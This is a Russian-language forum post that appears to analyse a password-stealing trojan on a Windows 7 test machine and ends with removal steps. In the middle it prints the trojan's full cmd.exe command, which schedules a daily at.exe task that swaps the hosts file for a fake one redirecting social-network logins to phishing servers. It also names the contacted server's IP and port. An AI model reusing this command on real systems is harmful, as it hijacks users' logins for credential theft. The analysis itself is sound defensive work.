Как и обещал - анализ вредоносной программы в архиве dREbbSq.rar,
Trojan.PWS.Stealer.1932 (По классификации Dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.
Началось все с эпик фэйла, защитник виндовс зарубил софтину на корню, пришлось трояну помочь, разрешив его выполнение.
Далее произошло следующее
Троян почитал настройки интернета, поковырялся в истории ИЕ, в кукисах, изменил настройки безопасности зон интранета, и полез на сервер 37.10.104.92:4915 никаких данных не передавал, скорее всего получил файл фейкового хоста.
После этого создал в %temp% фейковый hosts, попытался создать тот же файл в папке Windows, на что ему не хватило доступа. В файле, на самом донышке обнаружились записи перенаправляющие страницы входа соцсетей mail, vk, odnoklassniki на сервер зловредов. Т.е. пользователь при попытке входа в соцсети подарит свои учетные данные, плюс для восстановления доступа к соцсетям ему предложат привязать анкету к телефону(ещё и с денежкой расстанется)
Но пока этот файл мирно покоится в папке %temp% и ничем нам не угрожает, Зловредный код все ещё не активирован.
Далее идет активация cmd.exe
"C:\Windows\System32\cmd.exe" /c copy C:\Windows\system32\drivers\etc\hosts C:\Windows\system32\drivers\etc\hosts.sam /Y && at 22:49:00 /every:M,T,W,Th,F,S,Su cmd.exe "/c attrib -H C:\Windows\system32\drivers\etc\hosts && copy C:\Users\Freelncr\AppData\Local\Temp\1857847aq C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts"
Эти данные позднее будут переданы в at.exe(приложения для создания назначенных заданий)
Все таки нам приходится ещё раз помочь трояну, и мы повышаем привилегию процесса.
после успешного старта cmd.exe родительский процесс 622блабла.exe завершает свою работу и больше не запускается никогда.
at.exe создает задание
Данное задание периодически заменяет нормальный хост фейковым.
После создания задачи все процессы завершаются, и далее вся работа ложится на планировщик, который тупо будет заменять хост фейковым.
Лечение.
Для маскировки троян больше не проявляет себя, оставив только задание в планировщике, в котором никакого вредоносного кода нет, только стандартная операция копирования. С большой вероятностью даже при обнаружении антивирусом тела, и очистки hosts задание будет продолжать исправно работать.
Сооствественно лечение состоит в удалении тела, задания и файла hosts.
Просмотр Autoruns, ProcExp, ProcMon после перезагрузки никаких следов деятельности трояна не показал, излечение полное. Записей в автозагрузке троян не оставляет, никакие системные файлы не модифицирует.
Ну и напоследов разница между фейковым хостом и настоящим: